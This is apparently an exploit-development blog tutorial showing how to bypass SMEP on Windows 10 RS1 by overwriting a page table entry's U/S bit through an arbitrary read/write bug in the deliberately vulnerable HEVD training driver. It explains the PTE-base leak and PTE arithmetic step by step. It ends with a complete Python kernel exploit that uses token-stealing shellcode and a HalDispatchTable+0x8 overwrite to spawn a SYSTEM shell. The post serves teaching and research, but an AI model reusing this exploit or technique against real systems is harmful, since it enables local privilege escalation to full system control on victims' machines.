Although there has been some AMAZING research on this, I have not seen much in the way of practical blog posts showcasing this technique in the wild (that is, taking an exploit start to finish leveraging this technique in a blog post). Most of the research surrounding this topic, although absolutely brilliant, only explains how these mitigation bypasses work. This led to some issues for me when I started applying this research into actual exploitation, as I only had theory to go off of.

Since I had some trouble implementing said research into a practical example, I’m writing this blog post in hopes it will aid those looking for more detail on how to leverage these mitigation bypasses in a practical manner.

This blog post is going to utilize the HackSys Extreme Vulnerable Driver (HEVD) to outline bypassing SMEP and bypassing NX in the kernel. The vulnerability class will be an arbitrary read/write primitive, which can write one QWORD to kernel mode memory per IOCTL routine.

Thank you to Ashfaq of HackSysTeam for this driver!

In addition to said information, these techniques will be utilized on a Windows 10 64-bit RS1 build. This is because Windows 10 RS2 has kernel Control Flow Guard (kCFG) enabled by default, which is beyond the scope of this post. This post simply aims to show the techniques used in today’s “modern exploitation era” to bypass SMEP or NX in kernel mode memory.

Why Go to the Mountain, If You Can Bring the Mountain to You?

The adage used for the title of this section comes from Spencer Pratt’s WriteProcessMemory() white paper about bypassing DEP. This saying, or adage, is extremely applicable to the method of bypassing SMEP through PTEs.

Let’s start with some pseudo code!

# Allocating user mode code
payload = kernel32.VirtualAlloc(
    c_int(0),                         # lpAddress
    c_int(len(shellcode)),            # dwSize
    c_int(0x3000),                    # flAllocationType
    c_int(0x40)                       # flProtect
)

---------------------------------------------------------

# Grabbing HalDispatchTable + 0x8 address
HalDispatchTable+0x8 = NTBASE + 0xFFFFFF

# Writing payload to HalDispatchTable + 0x8
www.What = payload
www.Where = HalDispatchTable + 0x8

---------------------------------------------------------

# Spawning SYSTEM shell
print "[+] Enjoy the NT AUTHORITY\SYSTEM shell!!!!"
os.system("cmd.exe /K cd C:\\")

Note, the above code is syntactically incorrect, but it is there nonetheless to help us understand what is going on.

Also, before moving on, write-what-where = arbitrary memory overwrite = arbitrary write primitive.

Carrying on, the above pseudo code snippet is allocating virtual memory in user mode, via VirtualAlloc(). Then, utilizing the write-what-where vulnerability in the kernel mode driver, the shellcode’s virtual address (residing in user mode) gets written to nt!HalDispatchTable+0x8 (residing in kernel mode), which is a very common technique to use in an arbitrary memory overwrite situation.

Please refer to my last post on how this technique works.

As it stands now, execution of this code will result in an ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY Bug Check. This Bug Check is indicative of SMEP kicking in.

Letting the code execute, we can see this is the case.

Here, we can clearly see our shellcode has been allocated at 0x2620000.

SMEP kicks in, and we can see the offending address is that of our user mode shellcode (Arg2 of PTE contents is highlighted as well. We will circle back to this in a moment).

Recall, from a previous blog of mine, that SMEP kicks in whenever code that resides in current privilege level (CPL 3) of the CPU (CPL 3 code = user mode code) is executed in context of CPL 0 (kernel mode).

SMEP is triggered in this case, as we are attempting to access the shellcode’s virtual address in user mode from nt!HalDispatchTable+0x8, which is in kernel mode.

But the real question is HOW SMEP is implemented.

SMEP is mandated/enabled through the OS via bit 20 (counting from 0) of the CR4 control register.

Bit 20 in the above image corresponds to the leading 1 in the CR4 register’s value of 0x170678 (0x100000), meaning SMEP is enabled on this system globally.
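As a quick sanity check, the SMEP bit can be tested with a simple mask. This is just a minimal sketch: the constant and helper names are my own, and the CR4 value is the one quoted above.

```python
# Bit 20 of CR4 is the SMEP enable bit (bits are counted from 0)
CR4_SMEP_BIT = 20
CR4_SMEP_MASK = 1 << CR4_SMEP_BIT          # 0x100000

def smep_enabled(cr4_value):
    # Hypothetical helper: True if the SMEP bit is set in a CR4 value
    return (cr4_value & CR4_SMEP_MASK) != 0

cr4 = 0x170678                             # CR4 value quoted in the text
smep_on = smep_enabled(cr4)

# The same value with only the SMEP bit cleared
cr4_without_smep = cr4 & ~CR4_SMEP_MASK
```

Clearing that one bit is what a CR4-overwrite style bypass aims for. The rest of this post leaves CR4 alone entirely.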

However, SMEP is ENFORCED on a per memory page basis, via the U/S PTE control bit. This is what we are going to shift our focus to in this post.

Alex Ionescu gave a talk at Infiltrate 2015 about the implementation of SMEP on a per page basis.

Citing his slides, he explains that Intel has the following to say about SMEP enforcement on a per page basis.

“Any page level marked as supervisor (U/S=0) will result in treatment as supervisor for SMEP enforcement.”

Let’s take a look at the output of !pte in WinDbg of our user mode shellcode page to make sense of all of this!

What Intel means by the statement cited in Alex’s talk is that only ONE of the paging structure entries for an address (for example, the page table entry) needs to be marked as supervisor (kernel) in order for SMEP to not trigger. We do not need all 4 entries to be supervisor (kernel) mode!

This is wonderful for us, from an exploit development standpoint - as this GREATLY reduces our workload (we will see why shortly)!

Let’s learn how we can leverage this new knowledge, by first examining the current PTE control bits of our shellcode page:

  1. D - The “dirty” bit has been set, meaning a write to this address has occurred (KERNELBASE!VirtualAlloc()).
  2. A - The “access” bit has been set, meaning this address has been referenced at some point.
  3. U - The “user” bit has been set here. When the memory management unit reads in this address, it recognizes it as a user mode address. When this bit is 1, the page is user mode. When this bit is clear, the page is kernel mode.
  4. W - The “write” bit has been set here, meaning this memory page is writable.
  5. E - The “executable” bit has been set here, meaning this memory page is executable.
  6. V - The “valid” bit is set here, meaning that the PTE is a valid PTE.
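To make the list above a bit more concrete, here is a rough sketch that decodes those control bits from a raw PTE value. The bit positions follow the standard x64 PTE layout. The helper name is my own, and the sample value is a user mode PTE that shows up later in this post. The “E” flag is derived the way !pte reports it: the page is executable when the no-execute bit (bit 63) is clear.

```python
# Bit positions of the x64 PTE control bits discussed above
PTE_FLAGS = [
    ("V", 0),   # valid (present)
    ("W", 1),   # writable
    ("U", 2),   # user (clear = supervisor/kernel)
    ("A", 5),   # accessed
    ("D", 6),   # dirty
]
PTE_NX_BIT = 63  # no-execute; the page is executable ("E") when this bit is clear

def decode_pte(pte_value):
    # Hypothetical helper: list the letters of the bits that are set
    flags = [name for name, bit in PTE_FLAGS if pte_value & (1 << bit)]
    if not pte_value & (1 << PTE_NX_BIT):
        flags.append("E")
    return flags

user_page_flags = decode_pte(0x2000000046b0f867)
```

With this value, every flag from the list above comes back as set, including U.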

Notice that most of these control bits were set with our call earlier to KERNELBASE!VirtualAlloc() in the pseudocode snippet via the function’s arguments of flAllocationType and flProtect.

Where Do We Go From Here?

Let’s shift our focus to the PTE entry from the !pte command output in the last screenshot. We can see that our entry is that of a user mode page, from the U/S bit being set. However, what if we cleared this bit out?

If the U/S bit is set to 0, the page should become a kernel mode page, based on the aforementioned information. Let’s investigate this in WinDbg.

Rebooting our machine, we reallocate our shellcode in user mode.

The above image performs the following actions:

  1. Shows our shellcode in a user mode allocation at the virtual address 0xc60000
  2. Shows the current PTE and control bits for our shellcode memory page
  3. Uses ep in WinDbg to overwrite the pointer at 0xFFFFF98000006300 (this is the address of our PTE. When dereferenced, it contains the actual PTE control bits)
  4. Clears the PTE control bit for U/S by subtracting 4 from the PTE control bit contents.

    Note, I found this to be the correct value to clear the U/S bit through trial and error.
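The reason subtracting 4 works is that U/S is bit 2 of the PTE, which has a value of 0x4, and we already know the bit is set. The same operation can be written as a mask, which has the small advantage of doing nothing if the bit is already clear. This is only a sketch with names I made up, and the PTE value is a sample user mode PTE that appears later in this post.

```python
PTE_USER_BIT = 0x4   # U/S is bit 2 of the PTE

def clear_user_bit(pte_value):
    # Hypothetical helper: mark a PTE as supervisor by clearing U/S
    return pte_value & ~PTE_USER_BIT

user_pte = 0x2000000046b0f867
kernel_pte = clear_user_bit(user_pte)

# Equivalent to the subtraction when the bit is set
same_as_subtract = (kernel_pte == user_pte - 4)

# Applying it a second time changes nothing, unlike subtracting 4 again
idempotent = (clear_user_bit(kernel_pte) == kernel_pte)
```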

After the U/S bit is cleared out, our exploit continues by overwriting nt!HalDispatchTable+0x8 with the pointer to our shellcode.

The exploit continues with a call to nt!KeQueryIntervalProfile(), which in turn calls nt!HalDispatchTable+0x8.

Stepping into the call qword ptr [nt!HalDispatchTable+0x8] instruction, we have hit our shellcode address and it has been loaded into RIP!

Executing the shellcode results in a manual bypass of SMEP!

Let’s refer back to the adage from earlier in the post:

Why go to the mountain, if you can bring the mountain to you?

Notice how we didn’t “disable” SMEP like we did a few blog posts ago with ROP. All we did this time was just play by SMEP’s rules! We didn’t go to SMEP and try to disable it, instead, we brought our shellcode to SMEP and said “treat this as you normally treat kernel mode memory.”

This is great, we know we can bypass SMEP through this method! But the question remains, how can we achieve this dynamically?

After all, we cannot just arbitrarily use WinDbg when exploiting other systems.

Calculating PTEs

The previously shown method of bypassing SMEP manually in WinDbg revolved around the fact we could dereference the PTE address of our shellcode page in memory and extract the control bits. The question now remains, can we do this dynamically without a debugger?

Our exploit not only gives us the ability to arbitrarily write, but it gives us the ability to arbitrarily read in data as well! We will be using this read primitive to our advantage.

Windows has a function for just about anything! Fetching the PTE for a given virtual address is no different. The kernel has an internal routine called nt!MiGetPteAddress that applies a specific formula to retrieve the address of the PTE associated with a virtual address.

The above function performs the following instructions:

  1. Bitwise shifts the contents of the RCX register to the right by 9 bits
  2. Moves the value of 0x7FFFFFFFF8 into RAX
  3. Bitwise AND’s the values of RCX and RAX together
  4. Moves the value of 0xFFFFFE0000000000 into RAX
  5. Adds the values of RAX and RCX
  6. Performs a return out of the function

Let’s take a second to break this down by importance. First things first, the number 0xFFFFFE0000000000 looks like it could potentially be important - as it resembles a 64-bit virtual memory address.

Turns out, this is important. This number is actually a memory address, and it is the base address of all of the PTEs! Let’s talk about the base of the PTEs for a second and its significance.

Rebooting the machine and disassembling the function again, we notice something.

0xFFFFFE0000000000 has now changed to 0xFFFF800000000000. The base of the PTEs has changed, it seems.

This is due to page table randomization, a mitigation of Windows 10. Microsoft definitely had the right idea to implement this mitigation, but to be honest it is not of much use if the attacker already has an arbitrary read primitive.

An attacker needs an arbitrary read primitive in the first place to extract the contents of the PTE control bits by dereferencing the PTE of a given memory page.

If an attacker already has this ability, the adversary could just use the same primitive to read in nt!MiGetPteAddress+0x13, which, when dereferenced, contains the base of the PTEs.

Again, not ripping on Microsoft - I think they honestly have some of the best default OS exploit mitigations in the business. Just something I thought of.
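To see why the offset is 0x13, it helps to lay out the bytes of the function. The byte string below is hand-assembled by me from the six instructions listed earlier, so treat the exact encoding as an assumption rather than a dump from a real kernel. The PTE base used is the 0xFFFFFE0000000000 value from the first disassembly.

```python
import struct

# Hand-assembled bytes for the instructions listed earlier (assumed encoding)
mi_get_pte_address = (
    b"\x48\xC1\xE9\x09"                          # shr rcx, 9
    b"\x48\xB8\xF8\xFF\xFF\xFF\x7F\x00\x00\x00"  # mov rax, 0x7FFFFFFFF8
    b"\x48\x23\xC8"                              # and rcx, rax
    b"\x48\xB8\x00\x00\x00\x00\x00\xFE\xFF\xFF"  # mov rax, 0xFFFFFE0000000000
    b"\x48\x03\xC1"                              # add rax, rcx
    b"\xC3"                                      # ret
)

# The second mov starts at offset 0x11; its 8-byte immediate starts 2 bytes later
PTE_BASE_OFFSET = 0x13
pte_base = struct.unpack_from("<Q", mi_get_pte_address, PTE_BASE_OFFSET)[0]
```

In other words, nt!MiGetPteAddress+0x13 is not a pointer stored in a data section. It is the immediate operand baked into the instruction itself, which is why reading 8 bytes from that address returns the base of the PTEs.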

The method of reusing an arbitrary read primitive is actually what we are going to do here! But before we do, let’s talk about the PTE formula one last time.

As we saw, a bitwise shift right operation is performed on the contents of the RCX register. That is because when this function is called, the virtual address whose PTE you would like to fetch gets loaded into RCX.

We can mimic this same behavior in Python also!

# Bitwise shift shellcode virtual address to the right 9 bits
shellcode_pte = shellcode_virtual_address >> 9

# Bitwise AND the bitwise shifted right shellcode virtual address with 0x7ffffffff8
shellcode_pte &= 0x7ffffffff8

# Add the base of the PTEs to the above value (which will need to be previously extracted with an arbitrary read)
shellcode_pte += base_of_ptes

The variable shellcode_pte will now contain the address of the PTE for our shellcode page! We can demonstrate this behavior in WinDbg.

Sorry for the poor screenshot above in advance.
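The same check can be done in Python by wrapping the formula in a function and feeding it the values from the manual WinDbg walkthrough earlier (shellcode at 0xc60000, PTE at 0xFFFFF98000006300). The function name is my own, and the PTE base of 0xFFFFF98000000000 is an assumption inferred from those two addresses, since the base for that boot is not shown directly.

```python
def get_pte_address(virtual_address, base_of_ptes):
    # Same arithmetic as nt!MiGetPteAddress
    pte = virtual_address >> 9
    pte &= 0x7ffffffff8
    return pte + base_of_ptes

# Assumed PTE base, inferred from the addresses in the earlier WinDbg session
assumed_pte_base = 0xFFFFF98000000000

shellcode_pte = get_pte_address(0xc60000, assumed_pte_base)
```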

But as we can see, our version of the formula works - and we can now dynamically fetch a PTE address! The only question that remains is, how do we dynamically dereference nt!MiGetPteAddress+0x13 with an arbitrary read?

Read, Read, Read!

To use our arbitrary read, we are actually going to use our arbitrary write!

Our write-what-where primitive allows us to write a pointer (the what) to a pointer (the where). The school of thought here, is to write the address of nt!MiGetPteAddress+0x13 (the what) to a c_void_p() data type, which is Python’s representation of a C void pointer.

What will happen here is the following:

  1. The “what” member of the write-what-where is treated as a POINTER (a.k.a the driver takes the memory address we supply and dereferences it - which results in extracting the contents it points to). We will supply the address of nt!MiGetPteAddress+0x13, so the write primitive will extract what nt!MiGetPteAddress+0x13 points to, which is the base of the PTEs, and write it somewhere we can fetch the result!
  2. The “where” member of the write-what-where is also a pointer. The driver writes the extracted “what” value (base of the PTEs) to the address we supply (a.k.a if the “what” value gets written to 0xFFFFFFFFFFFFFFFF, that means 0xFFFFFFFFFFFFFFFF will now POINT to the “what” value, which is the base of the PTEs).

The thought process here is, if we write the base of the PTEs to OUR OWN pointer that we create - we can then dereference our pointer and extract the contents ourselves!
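Here is a tiny user mode simulation of that idea, with no driver involved. The function simulated_write_what_where is a stand-in I wrote that mimics the copy described above (8 bytes from the “what” address to the “where” address), and the “kernel” value is just a placeholder living in our own process.

```python
import ctypes

def simulated_write_what_where(what, where):
    # Stand-in for the vulnerable driver routine: *where = *what (8 bytes)
    ctypes.memmove(where, what, 8)

# Pretend this QWORD lives in the kernel and holds the base of the PTEs
kernel_qword = ctypes.c_uint64(0xFFFFF98000000000)

# Our own 8-byte variable that will receive the leaked value
leak = ctypes.c_uint64(0)

simulated_write_what_where(
    ctypes.addressof(kernel_qword),   # "what": the address we want to read from
    ctypes.addressof(leak)            # "where": the address of our own variable
)

leaked_value = leak.value
```

Pointing the “where” at memory we own is what turns the write primitive into a read primitive.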

Here is how this all looks in Python!

First, we declare a structure (one member for the “what” value, one member for the “where” value)

# First structure, for obtaining nt!MiGetPteAddress+0x13 value
class WriteWhatWhere_PTE_Base(Structure):
    _fields_ = [
        ("What_PTE_Base", c_void_p),
        ("Where_PTE_Base", c_void_p)
    ]

Secondly, we fetch the memory address of nt!MiGetPteAddress+0x13

Note - your offset from the kernel base to this function may be different!

# Retrieving nt!MiGetPteAddress (Windows 10 RS1 offset)
nt_mi_get_pte_address = kernel_address + 0x51214

# Base of PTEs is located at nt!MiGetPteAddress + 0x13
pte_base = nt_mi_get_pte_address + 0x13

Thirdly, we declare a c_void_p() to store the value pointed to by nt!MiGetPteAddress+0x13

# Creating a pointer in which the contents of nt!MiGetPteAddress+0x13 will be stored in to
# Base of the PTEs are stored here
base_of_ptes_pointer = c_void_p()

Fourthly, we initialize our structure with our “what” value and our “where” value. This writes what the address nt!MiGetPteAddress+0x13 points to (the base of the PTEs) into our declared pointer.

# Write-what-where structure #1
www_pte_base = WriteWhatWhere_PTE_Base()
www_pte_base.What_PTE_Base = pte_base
www_pte_base.Where_PTE_Base = addressof(base_of_ptes_pointer)
www_pte_pointer = pointer(www_pte_base)

Notice the where is the address of the pointer addressof(base_of_ptes_pointer). This is because we don’t want to overwrite the c_void_p’s address with anything - we want to store the value inside of the pointer.

This will store the value inside of the pointer because our write-what-where primitive writes a “what” value to a pointer.

Next, we make an IOCTL call to the routine that jumps to the arbitrary write in the driver.

# 0x0022200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pte_pointer,                    # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

A little Python ctypes magic here on dereferencing pointers.

# CTypes way of dereferencing a C void pointer
base_of_ptes = struct.unpack('<Q', base_of_ptes_pointer)[0]

The above snippet of code will read in the c_void_p() (which contains the base of the PTEs) and store it in the variable base_of_ptes.
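For what it is worth, struct.unpack() works here because ctypes objects expose their raw bytes, so it simply reads the 8 bytes sitting inside the object. The .value attribute gets at the same data. The sketch below uses c_uint64 with a placeholder value instead of a real leak, so it behaves the same regardless of pointer size.

```python
import struct
from ctypes import c_uint64

# Placeholder for an 8-byte value that the driver would have written for us
leaked = c_uint64(0xFFFFF98000000000)

via_struct = struct.unpack('<Q', leaked)[0]   # reads the raw bytes of the object
via_value = leaked.value                      # ctypes accessor for the same data
```

One thing to keep in mind with c_void_p specifically is that .value returns None when the pointer is NULL, which is easy to trip over if the write never happened.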

Utilizing the base of the PTEs, we can now dynamically retrieve the location of our shellcode’s PTE by putting all of the code together!

We have successfully defeated page table randomization!

Read, Read, Read… Again!

Now that we have dynamically resolved the PTE address for our shellcode, we need to use our arbitrary read again to dereference the shellcode’s PTE and extract the PTE control bits so we can modify the page table entry to be kernel mode.

Using the same primitive as above, we can use Python again to dynamically retrieve all of this!

Firstly, we need to create another structure (again, one member for “what” and one member for “where”).

# Second structure, for obtaining the control bits for the PTE
class WriteWhatWhere_PTE_Control_Bits(Structure):
    _fields_ = [
        ("What_PTE_Control_Bits", c_void_p),
        ("Where_PTE_Control_Bits", c_void_p)
    ]

Secondly, we declare another c_void_p.

shellcode_pte_bits_pointer = c_void_p()

Thirdly, we initialize our structure with the appropriate variables

# Write-what-where structure #2
www_pte_bits = WriteWhatWhere_PTE_Control_Bits()
www_pte_bits.What_PTE_Control_Bits = shellcode_pte
www_pte_bits.Where_PTE_Control_Bits = addressof(shellcode_pte_bits_pointer)
www_pte_bits_pointer = pointer(www_pte_bits)

We then make another call to the IOCTL responsible for the vulnerability.

Before executing our updated exploit, let’s restart the computer to prove everything is working dynamically.

Our combined code executes - resulting in the extraction of the PTE control bits!

Awesome! All that is left now is to modify the U/S bit of the PTE control bits and then execute our shellcode!

Write, Write, Write!

Now that we have read in all of the information we need, it is time to modify the PTE of the shellcode memory page. To do this, all we need to do is subtract 4 from the extracted PTE control bits.

# Currently, the PTE control bit for U/S of the shellcode is that of a user mode memory page
# Flipping the U (user) bit to an S (supervisor/kernel) bit
shellcode_pte_control_bits_kernelmode = shellcode_pte_control_bits_usermode - 4

Now we have successfully gotten the value we would like to write over our current PTE, it is time to actually make the write.

To do this, we first setup a structure, just like the read primitive.

# Third structure, to overwrite the U (user) PTE control bit to an S (supervisor/kernel) bit
class WriteWhatWhere_PTE_Overwrite(Structure):
    _fields_ = [
        ("What_PTE_Overwrite", c_void_p),
        ("Where_PTE_Overwrite", c_void_p)
    ]

This time, however, we store the PTE bits in a pointer so when the write occurs, it writes the bits instead of trying to extract the memory address of 2000000046b0f867 - which is not a valid address.

# Need to store the PTE control bits as a pointer
# Using addressof(pte_overwrite_pointer) in Write-what-where structure #4 since a pointer to the PTE control bits are needed
pte_overwrite_pointer = c_void_p(shellcode_pte_control_bits_kernelmode)

Then, we initialize the structure again.

# Write-what-where structure #4
www_pte_overwrite = WriteWhatWhere_PTE_Overwrite()
www_pte_overwrite.What_PTE_Overwrite = addressof(pte_overwrite_pointer)
www_pte_overwrite.Where_PTE_Overwrite = shellcode_pte
www_pte_overwrite_pointer = pointer(www_pte_overwrite)

After everything is good to go, we make another IOCTL call to trigger the vulnerability, and we successfully turn our user mode page into a kernel mode page dynamically!

Goodbye, SMEP (v2 ft. PTE Overwrite)!

All that is left to do now is execute our shellcode via nt!HalDispatchTable+0x8 and nt!KeQueryIntervalProfile(). Since I have already done a post outlining how this works, I will link you to it so you can see how this actually executes our shellcode. This blog post assumes the reader has minimal knowledge of arbitrary memory overwrites to begin with.

Here is the final exploit, which can also be found on my GitHub.

# HackSysExtreme Vulnerable Driver Kernel Exploit (x64 Arbitrary Overwrite/SMEP Enabled)
# Windows 10 RS1 - SMEP Bypass via PTE Overwrite
# Author: Connor McGarr

import struct
import sys
import os
from ctypes import *

kernel32 = windll.kernel32
ntdll = windll.ntdll
psapi = windll.Psapi

# First structure, for obtaining nt!MiGetPteAddress+0x13 value
class WriteWhatWhere_PTE_Base(Structure):
    _fields_ = [
        ("What_PTE_Base", c_void_p),
        ("Where_PTE_Base", c_void_p)
    ]

# Second structure, for obtaining the control bits for the PTE
class WriteWhatWhere_PTE_Control_Bits(Structure):
    _fields_ = [
        ("What_PTE_Control_Bits", c_void_p),
        ("Where_PTE_Control_Bits", c_void_p)
    ]

# Third structure, to overwrite the U (user) PTE control bit to an S (supervisor/kernel) bit
class WriteWhatWhere_PTE_Overwrite(Structure):
    _fields_ = [
        ("What_PTE_Overwrite", c_void_p),
        ("Where_PTE_Overwrite", c_void_p)
    ]

# Fourth structure, to overwrite HalDispatchTable + 0x8 with kernel mode shellcode page
class WriteWhatWhere(Structure):
    _fields_ = [
        ("What", c_void_p),
        ("Where", c_void_p)
    ]

# Token stealing payload
payload = bytearray(
    "\x65\x48\x8B\x04\x25\x88\x01\x00\x00"              # mov rax,[gs:0x188]  ; Current thread (KTHREAD)
    "\x48\x8B\x80\xB8\x00\x00\x00"                      # mov rax,[rax+0xb8]  ; Current process (EPROCESS)
    "\x48\x89\xC3"                                      # mov rbx,rax         ; Copy current process to rbx
    "\x48\x8B\x9B\xF0\x02\x00\x00"                      # mov rbx,[rbx+0x2f0] ; ActiveProcessLinks
    "\x48\x81\xEB\xF0\x02\x00\x00"                      # sub rbx,0x2f0       ; Go back to current process
    "\x48\x8B\x8B\xE8\x02\x00\x00"                      # mov rcx,[rbx+0x2e8] ; UniqueProcessId (PID)
    "\x48\x83\xF9\x04"                                  # cmp rcx,byte +0x4   ; Compare PID to SYSTEM PID
    "\x75\xE5"                                          # jnz 0x13            ; Loop until SYSTEM PID is found
    "\x48\x8B\x8B\x58\x03\x00\x00"                      # mov rcx,[rbx+0x358] ; SYSTEM token is @ offset _EPROCESS + 0x358
    "\x80\xE1\xF0"                                      # and cl, 0xf0        ; Clear out _EX_FAST_REF RefCnt
    "\x48\x89\x88\x58\x03\x00\x00"                      # mov [rax+0x358],rcx ; Copy SYSTEM token to current process
    "\x48\x31\xC0"                                      # xor rax,rax         ; set NTSTATUS SUCCESS
    "\xC3"                                              # ret                 ; Done!
)

# Defeating DEP with VirtualAlloc. Creating RWX memory, and copying the shellcode in that region.
print "[+] Allocating RWX region for shellcode"
ptr = kernel32.VirtualAlloc(
    c_int(0),                         # lpAddress
    c_int(len(payload)),              # dwSize
    c_int(0x3000),                    # flAllocationType
    c_int(0x40)                       # flProtect
)

# Creates a ctype variant of the payload (from_buffer)
c_type_buffer = (c_char * len(payload)).from_buffer(payload)

print "[+] Copying shellcode to newly allocated RWX region"
kernel32.RtlMoveMemory(
    c_int(ptr),                       # Destination (pointer)
    c_type_buffer,                    # Source (pointer)
    c_int(len(payload))               # Length
)

# Print update statement for shellcode location
print "[+] Shellcode is located at {0}".format(hex(ptr))

# Creating a pointer for the shellcode (write-what-where writes a pointer to a pointer)
# Using addressof(shellcode_pointer) in Write-what-where structure #5
shellcode_pointer = c_void_p(ptr)

# c_ulonglong because of x64 size (unsigned __int64)
base = (c_ulonglong * 1024)()

print "[+] Calling EnumDeviceDrivers()..."
get_drivers = psapi.EnumDeviceDrivers(
    byref(base),                      # lpImageBase (array that receives list of addresses)
    sizeof(base),                     # cb (size of lpImageBase array, in bytes)
    byref(c_long())                   # lpcbNeeded (bytes returned in the array)
)

# Error handling if function fails (EnumDeviceDrivers() returns 0 on failure)
if not get_drivers:
    print "[-] EnumDeviceDrivers() function call failed!"
    sys.exit(-1)

# The first entry in the array with device drivers is ntoskrnl base address
kernel_address = base[0]

# Print update for ntoskrnl.exe base address
print "[+] Found kernel leak!"
print "[+] ntoskrnl.exe base address: {0}".format(hex(kernel_address))

# Phase 1: Grab the base of the PTEs via nt!MiGetPteAddress

# Retrieving nt!MiGetPteAddress (Windows 10 RS1 offset)
nt_mi_get_pte_address = kernel_address + 0x51214

# Print update for nt!MiGetPteAddress address 
print "[+] nt!MiGetPteAddress is located at: {0}".format(hex(nt_mi_get_pte_address))

# Base of PTEs is located at nt!MiGetPteAddress + 0x13
pte_base = nt_mi_get_pte_address + 0x13

# Print update for nt!MiGetPteAddress+0x13 address
print "[+] nt!MiGetPteAddress+0x13 is located at: {0}".format(hex(pte_base))

# Creating a pointer in which the contents of nt!MiGetPteAddress+0x13 will be stored in to
# Base of the PTEs are stored here
base_of_ptes_pointer = c_void_p()

# Write-what-where structure #1
www_pte_base = WriteWhatWhere_PTE_Base()
www_pte_base.What_PTE_Base = pte_base
www_pte_base.Where_PTE_Base = addressof(base_of_ptes_pointer)
www_pte_pointer = pointer(www_pte_base)

# Getting handle to driver to return to DeviceIoControl() function
handle = kernel32.CreateFileA(
    "\\\\.\\HackSysExtremeVulnerableDriver", # lpFileName
    0xC0000000,                         # dwDesiredAccess
    0,                                  # dwShareMode
    None,                               # lpSecurityAttributes
    0x3,                                # dwCreationDisposition
    0,                                  # dwFlagsAndAttributes
    None                                # hTemplateFile
)

# 0x0022200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pte_pointer,                    # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# CTypes way of dereferencing a C void pointer
base_of_ptes = struct.unpack('<Q', base_of_ptes_pointer)[0]

# Print update for PTE base
print "[+] Leaked base of PTEs!"
print "[+] Base of PTEs are located at: {0}".format(hex(base_of_ptes))

# Phase 2: Calculate the shellcode's PTE address

# Calculating the PTE for shellcode memory page
shellcode_pte = ptr >> 9
shellcode_pte &= 0x7ffffffff8
shellcode_pte += base_of_ptes

# Print update for Shellcode PTE
print "[+] PTE for the shellcode memory page is located at {0}".format(hex(shellcode_pte))

# Phase 3: Extract shellcode's PTE control bits

# Declaring C void pointer to store shellcode PTE control bits
shellcode_pte_bits_pointer = c_void_p()

# Write-what-where structure #2
www_pte_bits = WriteWhatWhere_PTE_Control_Bits()
www_pte_bits.What_PTE_Control_Bits = shellcode_pte
www_pte_bits.Where_PTE_Control_Bits = addressof(shellcode_pte_bits_pointer)
www_pte_bits_pointer = pointer(www_pte_bits)

# 0x0022200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pte_bits_pointer,               # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# CTypes way of dereferencing a C void pointer
shellcode_pte_control_bits_usermode = struct.unpack('<Q', shellcode_pte_bits_pointer)[0]

# Print update for PTE control bits
print "[+] PTE control bits for shellcode memory page: {:016x}".format(shellcode_pte_control_bits_usermode)

# Phase 4: Overwrite current PTE U/S bit for shellcode page with an S (supervisor/kernel)

# Currently, the PTE control bit for U/S of the shellcode is that of a user mode memory page
# Flipping the U (user) bit to an S (supervisor/kernel) bit
shellcode_pte_control_bits_kernelmode = shellcode_pte_control_bits_usermode - 4

# Need to store the PTE control bits as a pointer
# Using addressof(pte_overwrite_pointer) in Write-what-where structure #4 since a pointer to the PTE control bits are needed
pte_overwrite_pointer = c_void_p(shellcode_pte_control_bits_kernelmode)

# Write-what-where structure #4
www_pte_overwrite = WriteWhatWhere_PTE_Overwrite()
www_pte_overwrite.What_PTE_Overwrite = addressof(pte_overwrite_pointer)
www_pte_overwrite.Where_PTE_Overwrite = shellcode_pte
www_pte_overwrite_pointer = pointer(www_pte_overwrite)

# Print update for PTE overwrite
print "[+] Goodbye SMEP..."
print "[+] Overwriting shellcode's PTE user control bit with a supervisor control bit..."

# 0x0022200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pte_overwrite_pointer,          # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Print update for PTE overwrite round 2
print "[+] User mode shellcode page is now a kernel mode page!"

# Phase 5: Shellcode

# nt!HalDispatchTable address (Windows 10 RS1 offset)
haldispatchtable_base_address = kernel_address + 0x2f1330

# nt!HalDispatchTable + 0x8 address
haldispatchtable = haldispatchtable_base_address + 0x8

# Print update for nt!HalDispatchTable + 0x8
print "[+] nt!HalDispatchTable + 0x8 is located at: {0}".format(hex(haldispatchtable))

# Write-what-where structure #5
www = WriteWhatWhere()
www.What = addressof(shellcode_pointer)
www.Where = haldispatchtable
www_pointer = pointer(www)

# 0x0022200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
print "[+] Interacting with the driver..."
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pointer,                        # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Actually calling NtQueryIntervalProfile function, which will call HalDispatchTable + 0x8, where the shellcode will be waiting.
ntdll.NtQueryIntervalProfile(
    0x1234,
    byref(c_ulonglong())
)

# Print update for shell
print "[+] Enjoy the NT AUTHORITY\SYSTEM shell!"
os.system("cmd.exe /K cd C:\\")

NT AUTHORITY\SYSTEM!

Rinse and Repeat

